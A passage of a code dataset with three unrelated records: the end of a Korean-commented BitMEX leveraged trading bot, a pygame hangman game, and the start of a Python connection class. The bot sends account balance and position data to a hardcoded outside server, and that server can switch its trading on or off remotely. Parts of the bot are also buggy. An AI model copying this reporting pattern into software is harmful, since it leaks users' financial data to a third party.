self.print_status()\r\n\r\n # Create orders and converge.\r\n # self.place_orders()\r\n\r\n def print_status(self):\r\n print('/////////////////////////', sys._getframe().f_code.co_name, '/////////////////////////')\r\n global floatBTCPrice, intBalancePosition, floatBalanceXBT, isNowTrade, intContractPosition, intAvgPurchasePrice, floatDelta, floatTotalProfit, floatTotalProfitRate, LiqPrice\r\n \"\"\"Print the current MM status.\"\"\"\r\n\r\n margin = self.exchange.get_margin()\r\n position = self.exchange.get_position()\r\n self.running_qty = self.exchange.get_delta()\r\n tickLog = self.exchange.get_instrument()['tickLog']\r\n self.start_XBt = margin[\"marginBalance\"]\r\n floatDelta = abs(round(float(self.exchange.calc_delta()['spot']), 5))\r\n intBalancePosition = int((float(XBt_to_XBT(self.start_XBt)) * floatBTCPrice))\r\n floatBalanceXBT = abs(round(float(XBt_to_XBT(self.start_XBt)), 6))\r\n\r\n print('//////////////////////////////////////////////////////////////')\r\n print('////■■■//■//■//■//■///■■■///■////■//■/////■/////////')\r\n print('//////■////■//■■////■/////■///■/■///■■/////■/■///////')\r\n print('//////■////■//■//■//■/////■//■///■//■//■//■///■//////')\r\n print('//////////////////////////////////////////////////////////////')\r\n now = datetime.now()\r\n time_ = now.strftime('%Y-%m-%d %H:%M:%S')\r\n if is_Long:\r\n print(time_, 'Long 주문')\r\n else:\r\n print(time_, 'Short 주문')\r\n print('구매시간', strPurchaseTime[:16])\r\n print('XBT Balance 잔고', XBt_to_XBT(self.start_XBt))\r\n print('Contract Position 계약 $', self.running_qty, '')\r\n print('LEVERAGE ', LEVERAGE, '배')\r\n # logger.info(\"Current XBT Balance: %.6f\" % XBt_to_XBT(self.start_XBt))\r\n # logger.info(\"Current Contract Position: %d\" % self.running_qty)\r\n if (type(position['avgCostPrice']) is int or type(position['avgCostPrice']) is float) and position['avgCostPrice'] > 0:\r\n # logger.info(\"Position limits: %d/%d\" % (settings.MIN_POSITION, settings.MAX_POSITION))\r\n isNowTrade = True\r\n intAvgPurchasePrice = round(float(position['avgCostPrice']), 2)\r\n intContractPosition = self.running_qty\r\n LiqPrice = float(position['liquidationPrice'])\r\n rate = 0\r\n\r\n if intSellPrice > 0:\r\n rate = round(abs(intAvgPurchasePrice - intSellPrice) / intAvgPurchasePrice * 100, 2)\r\n print('LiqPrice Price 청산가', float(LiqPrice))\r\n print('Avg Cost Price 평균단가', float(position['avgCostPrice']))\r\n print()\r\n print('floatBTCPrice 현재가', float(floatBTCPrice))\r\n if intSellPrice > 0:\r\n print('Avg', float(position['avgCostPrice']), '-> Sell', float(intSellPrice), '', float(rate), '% 수익 목표')\r\n if is_Long:\r\n now_rate = -round(((intAvgPurchasePrice - floatBTCPrice) / intAvgPurchasePrice) * 100 - COMMISION, 2)\r\n else:\r\n now_rate = round(((intAvgPurchasePrice - floatBTCPrice) / intAvgPurchasePrice) * 100 + COMMISION, 2)\r\n print('Now Margin 현수익률', float(now_rate), '%')\r\n # logger.info(\"LiqPrice Price: %d\" % float(LiqPrice))\r\n # logger.info(\"Avg Cost Price: %.*f\" % (tickLog, float(position['avgCostPrice'])))\r\n # logger.info(\"Avg Entry Price: %.*f\" % (tickLog, float(position['avgEntryPrice'])))\r\n # logger.info(\"Avg: %d -> Sell : $d, %.2f per\" % (float(LiqPrice), float(intSellPrice), float(rate)))\r\n # logger.info(\"Now Margin: %.2f per\" % float(now_rate))\r\n # logger.info(\"LiqPrice Price: %d\" % float(LiqPrice))\r\n else:\r\n isNowTrade = False\r\n print('Contracts Traded This Run', (self.running_qty - self.starting_qty))\r\n print('\"Total Contract Delta 계약된 XBT', round(self.exchange.calc_delta()['spot'], 6))\r\n # logger.info(\"Contracts Traded This Run: %d\" % (self.running_qty - self.starting_qty))\r\n # logger.info(\"Total Contract Delta: %.4f XBT\" % self.exchange.calc_delta()['spot'])\r\n print('///////////////////////////////////////////////////////////')\r\n print('///////////////////////////////////////////////////////////')\r\n\r\n\r\n if floatTotalProfit != 0 and not is_sell and float(self.exchange.calc_delta()['spot']) == 0:\r\n self.sendProfit() # 수익률 보내기\r\n sleep(60)\r\n\r\n floatTotalProfit = 0 # 이득\r\n\r\n def get_ticker(self):\r\n global start_position_buy, start_position_sell\r\n ticker = self.exchange.get_ticker()\r\n tickLog = self.exchange.get_instrument()['tickLog']\r\n\r\n # Set up our buy & sell positions as the smallest possible unit above and below the current spread\r\n # and we'll work out from there. That way we always have the best price but we don't kill wide\r\n # and potentially profitable spreads.\r\n start_position_buy = self.start_position_buy = ticker[\"buy\"] + self.instrument['tickSize']\r\n start_position_sell = self.start_position_sell = ticker[\"sell\"] - self.instrument['tickSize']\r\n\r\n # If we're maintaining spreads and we already have orders in place,\r\n # make sure they're not ours. If they are, we need to adjust, otherwise we'll\r\n # just work the orders inward until they collide.\r\n if settings.MAINTAIN_SPREADS:\r\n if ticker['buy'] == self.exchange.get_highest_buy()['price']:\r\n self.start_position_buy = ticker[\"buy\"]\r\n if ticker['sell'] == self.exchange.get_lowest_sell()['price']:\r\n self.start_position_sell = ticker[\"sell\"]\r\n\r\n # Back off if our spread is too small.\r\n if self.start_position_buy * (1.00 + settings.MIN_SPREAD) > self.start_position_sell:\r\n self.start_position_buy *= (1.00 - (settings.MIN_SPREAD / 2))\r\n self.start_position_sell *= (1.00 + (settings.MIN_SPREAD / 2))\r\n\r\n # Midpoint, used for simpler order placement.\r\n self.start_position_mid = ticker[\"mid\"]\r\n # logger.info(\r\n # \"%s Ticker: Buy: %.*f, Sell: %.*f\" %\r\n # (self.instrument['symbol'], tickLog, ticker[\"buy\"], tickLog, ticker[\"sell\"])\r\n # )\r\n # logger.info('Start Positions: Buy: %.*f, Sell: %.*f, Mid: %.*f' %\r\n # (tickLog, self.start_position_buy, tickLog, self.start_position_sell,\r\n # tickLog, self.start_position_mid))\r\n return ticker\r\n\r\n ###\r\n # Position Limits\r\n ###\r\n def converge_orders(self, buy_orders, sell_orders):\r\n \"\"\"Converge the orders we currently have in the book with what we want to be in the book.\r\n This involves amending any open orders and creating new ones if any have filled completely.\r\n We start from the closest orders outward.\"\"\"\r\n\r\n tickLog = self.exchange.get_instrument()['tickLog']\r\n to_amend = []\r\n to_create = []\r\n to_cancel = []\r\n buys_matched = 0\r\n sells_matched = 0\r\n existing_orders = self.exchange.get_orders()\r\n\r\n # Check all existing orders and match them up with what we want to place.\r\n # If there's an open one, we might be able to amend it to fit what we want.\r\n naver_touch_order = 2 # 0-buy 1-sell 2-nothing\r\n if len(buy_orders) > 0 and type(buy_orders[0]) is int and buy_orders[0] == 1234567:\r\n buy_orders = []\r\n naver_touch_order = 0\r\n if len(sell_orders) > 0 and type(sell_orders[0]) is int and sell_orders[0] == 1234567:\r\n sell_orders = []\r\n naver_touch_order = 1\r\n\r\n for order in existing_orders:\r\n try:\r\n if order['side'] == 'Buy':\r\n desired_order = buy_orders[buys_matched]\r\n buys_matched += 1\r\n else:\r\n desired_order = sell_orders[sells_matched]\r\n sells_matched += 1\r\n\r\n # Found an existing order. Do we need to amend it?\r\n if desired_order['orderQty'] != order['leavesQty'] or (\r\n # If price has changed, and the change is more than our RELIST_INTERVAL, amend.\r\n desired_order['price'] != order['price'] and\r\n abs((desired_order['price'] / order['price']) - 1) > settings.RELIST_INTERVAL):\r\n to_amend.append({'orderID': order['orderID'], 'orderQty': order['cumQty'] + desired_order['orderQty'],\r\n 'price': desired_order['price'], 'side': order['side']})\r\n except IndexError:\r\n # Will throw if there isn't a desired order to match. In that case, cancel it.\r\n if order['side'] == 'Buy' and naver_touch_order != 0:\r\n to_cancel.append(order)\r\n if order['side'] == 'Sell' and naver_touch_order != 1:\r\n to_cancel.append(order)\r\n\r\n\r\n while buys_matched < len(buy_orders):\r\n to_create.append(buy_orders[buys_matched])\r\n buys_matched += 1\r\n\r\n while sells_matched < len(sell_orders):\r\n to_create.append(sell_orders[sells_matched])\r\n sells_matched += 1\r\n\r\n if len(to_amend) > 0:\r\n for amended_order in reversed(to_amend):\r\n reference_order = [o for o in existing_orders if o['orderID'] == amended_order['orderID']][0]\r\n logger.info(\"Amending %4s: %d @ %.*f to %d @ %.*f (%+.*f)\" % (\r\n amended_order['side'],\r\n reference_order['leavesQty'], tickLog, reference_order['price'],\r\n (amended_order['orderQty'] - reference_order['cumQty']), tickLog, amended_order['price'],\r\n tickLog, (amended_order['price'] - reference_order['price'])\r\n ))\r\n # This can fail if an order has closed in the time we were processing.\r\n # The API will send us `invalid ordStatus`, which means that the order's status (Filled/Canceled)\r\n # made it not amendable.\r\n # If that happens, we need to catch it and re-tick.\r\n try:\r\n self.exchange.amend_bulk_orders(to_amend)\r\n except requests.exceptions.HTTPError as e:\r\n errorObj = e.response.json()\r\n if errorObj['error']['message'] == 'Invalid ordStatus':\r\n logger.warn(\"Amending failed. Waiting for order data to converge and retrying.\")\r\n sleep(0.5)\r\n return self.run_loop()\r\n else:\r\n logger.error(\"Unknown error on amend: %s. Exiting\" % errorObj)\r\n sys.exit(1)\r\n\r\n if len(to_create) > 0:\r\n logger.info(\"Creating %d orders:\" % (len(to_create)))\r\n for order in reversed(to_create):\r\n logger.info(\"%4s %d @ %.*f\" % (order['side'], order['orderQty'], tickLog, order['price']))\r\n self.exchange.create_bulk_orders(to_create)\r\n\r\n # Could happen if we exceed a delta limit\r\n if len(to_cancel) > 0:\r\n logger.info(\"Canceling %d orders:\" % (len(to_cancel)))\r\n for order in reversed(to_cancel):\r\n logger.info(\"%4s %d @ %.*f\" % (order['side'], order['leavesQty'], tickLog, order['price']))\r\n self.exchange.cancel_bulk_orders(to_cancel)\r\n def short_position_limit_exceeded(self):\r\n \"\"\"Returns True if the short position limit is exceeded\"\"\"\r\n if not settings.CHECK_POSITION_LIMITS:\r\n return False\r\n position = self.exchange.get_delta()\r\n return position <= settings.MIN_POSITION\r\n\r\n def long_position_limit_exceeded(self):\r\n \"\"\"Returns True if the long position limit is exceeded\"\"\"\r\n if not settings.CHECK_POSITION_LIMITS:\r\n return False\r\n position = self.exchange.get_delta()\r\n return position >= settings.MAX_POSITION\r\n\r\n ###\r\n # Sanity\r\n ##\r\n\r\n def sanity_check(self):\r\n print('/////////////////////////', sys._getframe().f_code.co_name, '/////////////////////////')\r\n global floatBTCPrice\r\n # Check if OB is empty - if so, can't quote.\r\n self.exchange.check_if_orderbook_empty()\r\n\r\n # Ensure market is still open.\r\n self.exchange.check_market_open()\r\n\r\n # Get ticker, which sets price offsets and prints some debugging info.\r\n ticker = self.get_ticker() #Price info\r\n\r\n floatBTCPrice = float(ticker[\"buy\"]) # 현재가\r\n\r\n\r\n def check_file_change(self):\r\n \"\"\"Restart if any files we're watching have changed.\"\"\"\r\n for f, mtime in watched_files_mtimes:\r\n if getmtime(f) > mtime:\r\n self.restart()\r\n\r\n def check_connection(self):\r\n \"\"\"Ensure the WS connections are still open.\"\"\"\r\n return self.exchange.is_open()\r\n\r\n def exit(self):\r\n logger.info(\"Shutting down. All open orders will be cancelled.\")\r\n try:\r\n # self.exchange.cancel_all_orders()\r\n self.exchange.bitmex.exit()\r\n except errors.AuthenticationError as e:\r\n logger.info(\"Was not authenticated; could not cancel orders.\")\r\n except Exception as e:\r\n logger.info(\"Unable to cancel orders: %s\" % e)\r\n self.restart()\r\n # sys.exit()\r\n\r\n\r\n #####################################내가 짠거 ######################################\r\n\r\n def get_order_success(self):\r\n # 매수 주문 성공할때까지 기다리기\r\n global intAvgPurchasePrice, floatBalanceXBTFirst, strPurchaseTime, is_Long, intContractPosition\r\n floatBalanceXBTFirst = floatBalanceXBT # 매수 전 비트량\r\n # print('intContractPosition', intContractPosition)\r\n if intContractPosition < 0:\r\n is_Long = False\r\n print('Short Position')\r\n if intContractPosition > 0:\r\n is_Long = True\r\n print('Long Position')\r\n\r\n\r\n for a in range(10):\r\n sleep(7)\r\n position = self.exchange.get_position()\r\n self.running_qty = self.exchange.get_delta()\r\n intContractPosition = self.running_qty\r\n rate = intContractPosition / intBalancePosition *100\r\n if intContractPosition != 0 and rate > 90: #80이상은 사야지 뭘하지\r\n intAvgPurchasePrice = round(float(position['avgCostPrice']), 2)\r\n if intAvgPurchasePrice > 0:\r\n break\r\n # print(intAvgPurchasePrice)\r\n now = datetime.now()\r\n strPurchaseTime = now.strftime('%Y-%m-%d %H:%M:%S')\r\n if intAvgPurchasePrice < 0:\r\n self.exchange.cancel_all_orders() # 주문 취소\r\n\r\n\r\n # 매매 정보 보내기\r\n def sendTradeVal(self):\r\n print('/////////////////////////', sys._getframe().f_code.co_name, '/////////////////////////')\r\n global recent_process_time, SYMBOL\r\n recent_process_time = int(round(time.time()))#최근 구동 시간 정하기\r\n state = 2 # 0 수익률, 1 가격정보, 2 매매정보\r\n path = \"http://btcatm.cafe24.com/bcfree9/in1.php?serial=\" + serial\r\n\r\n userdata = {\"state\": state, \"serial\": serial, \"c1\": \"time\", \"c2\": SYMBOL, \"c3\": floatBTCPrice, \"c4\": float(floatBalanceXBT), \"c5\": floatDelta, \"c6\": intContractPosition, \"c7\":\r\n str(str(floatProfitRate) + \";\" + str(recent_profit_time)), \"c8\": intAvgPurchasePrice, \"c9\": LiqPrice, \"c10\": intPurchasePrice, \"c11\": LEVERAGE, \"c12\":\r\n RECENT_PROFIT_TIME_GAP, \"c13\": PRICE_SAVE_CNT_LIMIT, \"c14\": PriceCalclater.RANGE, \"c15\": PriceCalclater.POSITION_CNT, \"c16\": PriceCalclater.COMMISSION, \"c17\":\r\n 0, \"c18\": 0}\r\n resp = requests.post(path, params=userdata)\r\n #print('resp ', resp)\r\n\r\n # 수익률 보내기\r\n def sendProfit(self):\r\n print('/////////////////////////', sys._getframe().f_code.co_name, '/////////////////////////')\r\n\r\n state = 0 # 0 수익률, 1 가격정보, 2 매매정보\r\n path = \"http://btcatm.cafe24.com/bcfree9/in1.php?serial=\" + serial\r\n\r\n # 매도 후 비트량\r\n floatBalanceXBTSecond = float(floatBalanceXBT)\r\n profit = round((floatBalanceXBTSecond - floatBalanceXBTFirst) / floatBalanceXBTFirst * 100, 5)\r\n\r\n # 시간 최초가 매수대급합 매수비율\r\n delta = round(intContractPosition / floatBTCPrice, 5)\r\n purchase_sum_rate = round((delta / LEVERAGE) / floatBalanceXBT * 100, 2)\r\n # profit = floatProfitRate + COMMISION\r\n profitTotal = round((delta * profit / 100) / floatBalanceXBT * 100, 5)\r\n # print('settings.SYMBOL', settings.SYMBOL)\r\n userdata = {\"state\": state, \"serial\": serial, \"c1\": \"time\", \"c2\": intPurchasePrice, \"c3\": intContractPosition, \"c4\": round(intAvgPurchasePrice, 1), \"c5\": 0, \"c6\": profit, \"c7\": floatBalanceXBTSecond,\r\n \"c8\": \"0\", \"c9\": \"0\", \"c10\": settings.SYMBOL}\r\n resp = requests.post(path, params=userdata)\r\n ###\r\n # Running\r\n ###\r\n def getMovingAvg(self):\r\n # Print('//////////////' + getframeinfo(currentframe()).function + '//////////////')\r\n global arrBTCPriceMovingAvg, arrBTCTimeMovingAvg, arrBTCCandleMovingAvg, arrBTCRangeMovingAvg\r\n for a in range(10):\r\n arrBTCPriceMovingAvg = []\r\n arrBTCTimeMovingAvg = []\r\n (arrBTCPriceMovingAvg, arrBTCTimeMovingAvg, arrBTCCandleMovingAvg, arrBTCRangeMovingAvg) = getCandleAvgMoveBitmex.getBTCPrice(AVG_MOVING_RANGE)\r\n print(arrBTCPriceMovingAvg)\r\n print(arrBTCTimeMovingAvg)\r\n if len(arrBTCPriceMovingAvg) > 0:\r\n break\r\n sleep(3)\r\n\r\n def getTimeSub(self, time1, time2):\r\n time1 = datetime(int(time1[:4]), int(time1[5:7]), int(time1[8:10]), int(time1[11:13]), int(time1[14:16]), int(time1[17:19]))\r\n time2 = datetime(int(time2[:4]), int(time2[5:7]), int(time2[8:10]), int(time2[11:13]), int(time2[14:16]), int(time2[17:19]))\r\n return ((time1 - time2).days * 86400 + (time1 - time2).seconds)\r\n\r\n def setLongShort(self):\r\n global is_Long\r\n now = datetime.now()\r\n time_ = now.strftime('%Y-%m-%d %H:%M:%S')\r\n idx = 0\r\n # for a in range(len(arrBTCTimeMovingAvg)):\r\n # print(time_, arrBTCTimeMovingAvg[a])\r\n # if self.getTimeSub(time_, arrBTCTimeMovingAvg[a]) < 0:\r\n # # print(a, arrBTCTime[cnt], arrBTCTimeMovingAvg[a-1])\r\n # # if arrBTCTime[cnt][:10] == arrBTCTimeMovingAvg[a][:10]:\r\n # idx = a - 1\r\n # if idx < 0:\r\n # idx = 0\r\n # break\r\n # exit()\r\n if intPurchasePrice < arrBTCPriceMovingAvg[len(arrBTCPriceMovingAvg) - 1]: # 현재가 < 이평 -> 롱\r\n is_Long = True\r\n print('Now it is Long')\r\n else:\r\n is_Long = False\r\n print('Now it is Short')\r\n\r\n # is_Long = False\r\n\r\n def place_purchase_orders(self):\r\n print('/////////////////////////', sys._getframe().f_code.co_name, '/////////////////////////')\r\n global intLastOrderPrice, SellSigned, BuySigned\r\n\r\n if start_state == STOP_AFTER_SELL:\r\n raise print('STOP after sell')\r\n intLastOrderPrice = 0 # 마지막 주문가\r\n SellSigned = 0 # 매도 체결량\r\n if is_Long:\r\n buy_orders = []\r\n sell_orders = [1234567] # 123456789면 취소하지 않기\r\n index = - 1\r\n intPurchasePrice = start_position_sell + 10\r\n else:\r\n buy_orders = [1234567]\r\n sell_orders = [] # 123456789면 취소하지 않기\r\n index = 1\r\n intPurchasePrice = start_position_sell - 10\r\n # Create orders from the outside in. This is intentional - let's say the inner order gets taken;\r\n # then we match orders from the outside in, ensuring the fewest number of orders are amended and only\r\n # a new order is created in the inside. If we did it inside-out, all orders would be amended\r\n # down and a new order would be created at the outside.\r\n weight_ = int(((intBalancePosition / floatBTCPrice) - floatDelta) * floatBTCPrice * LEVERAGE * 0.95)\r\n # print(intPurchasePrice, weight_, LEVERAGE)\r\n\r\n str = {'price': intPurchasePrice, 'orderQty': weight_, 'side': \"Buy\" if index < 0 else \"Sell\"}\r\n print('구매 주문', str)\r\n if is_Long:\r\n buy_orders.append(str)\r\n else:\r\n sell_orders.append(str)\r\n intLastOrderPrice = floatBTCPrice\r\n return self.converge_orders(buy_orders, sell_orders)\r\n\r\n def place_sell_orders(self, profit_rate):\r\n print('/////////////////////////', sys._getframe().f_code.co_name, '/////////////////////////')\r\n global intSellPrice, is_sell, floatTotalProfit, floatBalanceXBTFirst\r\n is_sell = False\r\n sleep(2)\r\n floatTotalProfit = intContractPosition\r\n if not is_Long:\r\n contract = BuySigned - SellSigned\r\n buy_orders = []\r\n sell_orders = [1234567] # 123456789면 취소하지 않기\r\n index = - 1\r\n else:\r\n contract = -(BuySigned - SellSigned)\r\n buy_orders = [1234567]\r\n sell_orders = [] # 123456789면 취소하지 않기\r\n index = 1\r\n # print(intAvgPurchasePrice)\r\n # print(profit_rate)\r\n # print(intAvgPurchasePrice * (1 + (profit_rate + COMMISION) / 100), intAvgPurchasePrice, profit_rate)\r\n if is_Long:\r\n intSellPrice = PriceCalclater.getCeilNum(intAvgPurchasePrice * (1 + (profit_rate + COMMISION) / 100))\r\n else:\r\n intSellPrice = PriceCalclater.getFloorNum(intAvgPurchasePrice * (1 - (profit_rate + COMMISION) / 100))\r\n str = {'price': intSellPrice, 'orderQty': (intContractPosition), 'side': \"Buy\" if index < 0 else \"Sell\"}\r\n print('구매 주문', str)\r\n if abs(intContractPosition) > 0:\r\n if not is_Long:\r\n buy_orders.append(str)\r\n else:\r\n sell_orders.append(str)\r\n\r\n return self.converge_orders(buy_orders, sell_orders)\r\n\r\n def place_sell_orders_losscut(self):\r\n print('/////////////////////////', sys._getframe().f_code.co_name, '/////////////////////////')\r\n global intSellPrice, is_sell, floatTotalProfit, floatBalanceXBTFirst\r\n is_sell = False\r\n sleep(2)\r\n floatTotalProfit = intContractPosition\r\n is_loss_cut = False\r\n\r\n #손절률 밑으로 떨어졌는지\r\n if is_Long and floatBTCPrice > 0:\r\n profit_rate = round(((floatBTCPrice - intAvgPurchasePrice) / intAvgPurchasePrice * 100 - COMMISION), 2)\r\n elif not is_Long and floatBTCPrice > 0:\r\n profit_rate = round(-((floatBTCPrice - intAvgPurchasePrice) / intAvgPurchasePrice * 100 - COMMISION), 2)\r\n if profit_rate < -abs(floatLossCutRate):\r\n is_loss_cut = True\r\n print('넘 떨어져서 손절', profit_rate)\r\n\r\n #시간 됐는지\r\n if len(strPurchaseTime) > 5:\r\n now = datetime.now()\r\n nowTime = now.strftime('%Y-%m-%d %H:%M:%S')\r\n if self.getTimeSub(nowTime, strPurchaseTime) > settings.LOSS_CUT_WAITING_TIME:\r\n is_loss_cut = True\r\n print('시간되서 손절')\r\n\r\n if is_loss_cut:#손절하기\r\n self.exchange.cancel_all_orders()\r\n if not is_Long:\r\n buy_orders = []\r\n sell_orders = [1234567] # 123456789면 취소하지 않기\r\n index = - 1\r\n else:\r\n buy_orders = [1234567]\r\n sell_orders = [] # 123456789면 취소하지 않기\r\n index = 1\r\n if is_Long:\r\n intSellPrice = int(floatBTCPrice * 0.95)\r\n else:\r\n intSellPrice = int(floatBTCPrice * 1.05)\r\n\r\n str = {'price': intSellPrice, 'orderQty': abs(intContractPosition), 'side': \"Buy\" if index < 0 else \"Sell\"}\r\n print('구매 주문', str)\r\n\r\n if abs(intContractPosition) > 0:\r\n if not is_Long:\r\n buy_orders.append(str)\r\n else:\r\n sell_orders.append(str)\r\n return self.converge_orders(buy_orders, sell_orders)\r\n if is_Long:\r\n intSellPrice = int(floatBTCPrice * 0.99)\r\n else:\r\n intSellPrice = int(floatBTCPrice * 1.01)\r\n\r\n def chkError(self):\r\n print('/////////////////////////', sys._getframe().f_code.co_name, '/////////////////////////')\r\n global intPriceSaveCnt, intPriceSave\r\n if intPriceSaveCnt > 5:\r\n print(\"Comparing same price: \", int(intPriceSaveCnt), \" times.\")\r\n # print \"Connecting is \", self.check_connection\r\n\r\n\r\n # ---1. 같은 가격 40번은 멈춘 것\r\n if floatBTCPrice == intPriceSave:\r\n intPriceSaveCnt += 1\r\n else:\r\n intPriceSave = floatBTCPrice\r\n intPriceSaveCnt = 0\r\n\r\n if intPriceSaveCnt > PRICE_SAVE_CNT_LIMIT: # 같은 가격 15번이면 에러\r\n print('Same Price ', intPriceSaveCnt, ' times. This is Error')\r\n is_trade_go = False\r\n #intPriceSaveCnt = 10\r\n self.exit()\r\n\r\n # ---2. 청산가 > 평단 = 공매도 떠버린것\r\n # if LiqPrice > intAvgPurchasePrice:#\r\n # print('LiqPrice is bigger than AVG cost, Error')\r\n # #is_trade_go = False\r\n # #self.exit()\r\n # self.RecoverTradingMiss()\r\n\r\n def getOnOff(self):\r\n global recent_profit_time, floatProfitRate, start_state\r\n url = 'http://btcatm.cafe24.com/bcfree7/out.php?serial=' + serial\r\n u = urllib.request.urlopen(url)\r\n data = u.read()\r\n conn_string = json.loads(data.decode('utf-8'))\r\n if len(str(conn_string['c_1'])) > 10:\r\n start_state = int(conn_string['onoff'])\r\n\r\n def run_loop(self):\r\n print('/////////////////////////', sys._getframe().f_code.co_name, '/////////////////////////')\r\n\r\n global isExitImmed, restart_working, SYMBOL\r\n\r\n is_trade_go = True # False 되면 마지막 됌\r\n is_first_start = True # 최초시작\r\n isExitImmed = False\r\n restart_working = True # temp\r\n self.exchange.cancel_all_orders()\r\n\r\n while is_trade_go:\r\n print('//////////////////////----START----////////////////////////////')\r\n sys.stdout.write(\"-----\\n\")\r\n sys.stdout.flush()\r\n\r\n # self.check_file_change()\r\n sleep(settings.LOOP_INTERVAL)\r\n\r\n # This will restart on very short downtime, but if it's longer,\r\n # the MM will crash entirely as it is unable to connect to the WS on boot.\r\n if not self.check_connection():\r\n logger.error(\"Realtime data connection unexpectedly closed, restarting.\")\r\n self.restart()\r\n\r\n if isExitNextTime:\r\n is_trade_go = False\r\n if start_state == STOP_NOW:\r\n raise print('STOP IMME')\r\n break\r\n # print('hah')\r\n self.getOnOff()\r\n self.sanity_check() # Ensures health of mm - several cut-out points here\r\n self.print_status() # Print skew, delta, etc\r\n self.chkError() #Chk Error\r\n\r\n if start_state == RURNNING or start_state == STOP_AFTER_SELL:\r\n if not isNowTrade:#정상 매매\r\n ##2. 매수 매도가 계산#\r\n self.exchange.cancel_all_orders()\r\n self.exchange.update_margin(settings.SYMBOL, LEVERAGE) # set leverage\r\n\r\n ##3. 매수 주문 넣기#\r\n self.getMovingAvg()\r\n self.setLongShort()\r\n self.place_purchase_orders()\r\n self.get_order_success()\r\n\r\n elif not is_first_start and isNowTrade:\r\n ##4. 매도 주문 넣기#\r\n self.place_sell_orders(floatProfitRate)\r\n self.place_sell_orders_losscut()\r\n elif is_first_start and isNowTrade:#복구할 대상이 있음\r\n ##6. 복구 매수 주문 넣기#\r\n # self.place_purchase_orders()\r\n\r\n self.get_order_success()\r\n\r\n else:\r\n print('뭥미??')\r\n self.sendTradeVal() #정보 보내기\r\n sleep(8)\r\n is_first_start = False\r\n\r\n def restart(self):\r\n logger.info(\"Restarting the market maker...\")\r\n os.execv(sys.executable, [sys.executable] + sys.argv)\r\n\r\n#\r\n# Helpers\r\n#\r\n\r\n\r\ndef XBt_to_XBT(XBt):\r\n return float(XBt) / constants.XBt_TO_XBT\r\n\r\n\r\ndef cost(instrument, quantity, price):\r\n mult = instrument[\"multiplier\"]\r\n P = mult * price if mult >= 0 else mult / price\r\n return abs(quantity * P)\r\n\r\n\r\ndef margin(instrument, quantity, price):\r\n return cost(instrument, quantity, price) * instrument[\"initMargin\"]\r\n\r\n\r\ndef run():\r\n logger.info('BitMEX Market Maker Version: %s\\n' % constants.VERSION)\r\n # print('haha')\r\n\r\n om = OrderManager()\r\n # Try/except just keeps ctrl-c from printing an ugly stacktrace\r\n try:\r\n # print('haha')\r\n\r\n om.run_loop()\r\n except (KeyboardInterrupt, SystemExit):\r\n print()\r\n # sys.exit()\r\n","sub_path":"market_maker.py","file_name":"market_maker.py","file_ext":"py","file_size_in_byte":41845,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"522108229","text":"#!/usr/bin/env python\nimport pygame,sys\nfrom pygame.locals import *\nfrom random import choice as ranlist\npygame.init()\nsize=width , height = 500,500\nscreen=pygame.display.set_mode(size)\nscreen.fill((255,255,255))\nalpha = list(map(chr, range(97, 123)))\nfont = pygame.font.Font('freesansbold.ttf', 32) \nheart=pygame.image.load(\"heart.png\")\nheart=pygame.transform.scale(heart,(50,50))\n# create a text suface object, \n# on which text is drawn on it. \n\ndef draw(see):\n screen.fill((255,255,255))\n \n for x in range(lives):\n screen.blit(heart,[10+(x*48),50]) \n char=font.render(\" \".join(alpha[:13]), True,(0,0,255))\n screen.blit(char,[40,350])\n char=font.render(\" \".join(alpha[13:25]), True,(0,0,255))\n screen.blit(char,[40,400])\n char=font.render(\" \".join(see), True,(0,0,255))\n screen.blit(char,[40,200])\n pygame.display.flip()\nraw =\"\"\"\"\"\".split()\n###put the main dictionary here###\ndic=['actor', 'airplane', 'airport', 'army', 'baseball', 'beef', 'birthday', 'boy', 'brush', 'bushes', 'butter', 'cast', 'cave', 'cent', 'cherries', 'cherry', 'cobweb', 'coil', 'cracker', 'dinner', 'eggnog', 'elbow', 'face', 'fireman', 'flavor', 'gate', 'glove', 'glue', 'goldfish', 'goose', 'grain', 'hair', 'haircut', 'hobbies', 'holiday', 'hot', 'jellyfish', 'ladybug', 'mailbox', 'number', 'oatmeal', 'pail', 'pancake', 'pear', 'pest', 'popcorn', 'queen', 'quicksand', 'quiet', 'quilt', 'rainstorm', 'scarecrow', 'scarf', 'stream', 'street', 'sugar', 'throne', 'toothpaste', 'twig', 'volleyball', 'wood', 'wrench']\n##################################\ndic+=raw\nwhile True:\n alpha = list(map(chr, range(97, 123)))\n word=ranlist(dic)\n dic.remove(word)\n origword=[x for x in word]\n word=[x for x in word]\n lives=10\n see=[\"_\"]*len(word)\n draw(see)\n while True:\n #exit cases\n if origword==see:\n pygame.time.wait(1000)\n screen.fill((0,255,25))\n \n char=font.render('you won',True,(0,0,0))\n screen.blit(char,[180,200])\n pygame.display.flip()\n pygame.time.wait(1000)\n break\n elif lives==0:\n pygame.time.wait(500)\n see=origword\n draw(see)\n pygame.time.wait(1000)\n screen.fill((255,0,25))\n char=font.render('you lose',True,(0,0,0))\n screen.blit(char,[180,200])\n pygame.display.flip()\n pygame.time.wait(1000)\n break\n choice=\"\"\n event=pygame.event.wait()\n if event.type==QUIT:\n pygame.quit()\n sys.exit()\n elif event.type==pygame.KEYDOWN:\n choice = str(event.unicode)\n if choice in word :\n while choice in word:\n see[word.index(choice)]=choice\n word[word.index(choice)]=\" \"\n alpha[alpha.index(choice)]=\"-\" \n elif choice in alpha:\n lives-=1\n alpha[alpha.index(choice)]=\"-\"\n draw(see)\n \n","sub_path":"old/stuff/pythonproj/hangman/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3039,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"186081337","text":"import os \r\nfrom urllib.parse import urlparse\r\n\r\n#_userid = None\r\n#_password = None\r\n_auth = None\r\n_baseurl = None\r\n_url = None\r\n_sslverify = None\r\n_timeout = None \r\n\r\n\r\nclass connection(object): \r\n def __init__(self, auth=\"\", url=\"\", noproxy=True, sslverify=False, timeout=3600, cert=None): \r\n self.auth = auth\r\n if self.auth == \"\":\r\n self.auth = _auth\r\n #self.userid = userid\r\n #if self.userid == \"\":\r\n # self.userid = _userid\r\n #self.password = password\r\n #if self.password == \"\":\r\n # self.password = _password\r\n self.baseurl = url\r\n if self.baseurl == \"\":\r\n self.baseurl = _baseurl\r\n \r\n self.noproxy = noproxy\r\n self.sslverify = sslverify\r\n self.timeout = timeout\r\n self.cert = cert\r\n\r\n self.domain = 